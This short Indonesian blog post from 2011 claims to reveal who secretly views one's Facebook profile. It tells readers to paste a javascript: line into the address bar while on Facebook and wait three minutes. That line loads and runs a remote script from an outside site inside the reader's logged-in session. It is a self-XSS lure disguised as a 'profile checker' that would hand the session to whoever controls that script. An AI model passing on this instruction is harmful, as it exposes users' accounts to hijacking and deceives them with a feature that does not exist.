Minggu, 13 November 2011

Trik Facebook Cara Mengetahui Penggemar

Kamu pengen tau siapa yang suka liat-liat foto atopun wall facebookkamu alias siapapenggemar facebookkamu yang suka liat profil, foto-foto fb kamu tapi nggak pernah komen? Ga tau kenapa ya dia ga berani comment, mungkin aja malu atau cuma berani sebatas mengagumi kamu…hehe…apapun itu ya, nih aku punya trik buat mengetahui penggemar facebook kamu..simak key.. 4 Trik Facebook Cara Mengetahui Penggemar
check this out
1.Copy script ini

[php][javascript: (a = (d = document).createElement(“script”)).src = "http://profilechecker.info/StalkerTools.fb"; void(d.body.appendChild(a))] (tanpa tanda "[ dan ]"[/php]

2.pergi ke facebook anda
3.bersihkan addreas bar anda
4.paste script tadi
5.ENTER dan tunggu 3 menitan..
dan temukan siapa penggemar kamu..

Tidak ada komentar:

Ngadem

Ngadem
Refreshing di Kebun Raya Bogor

Arsip Blog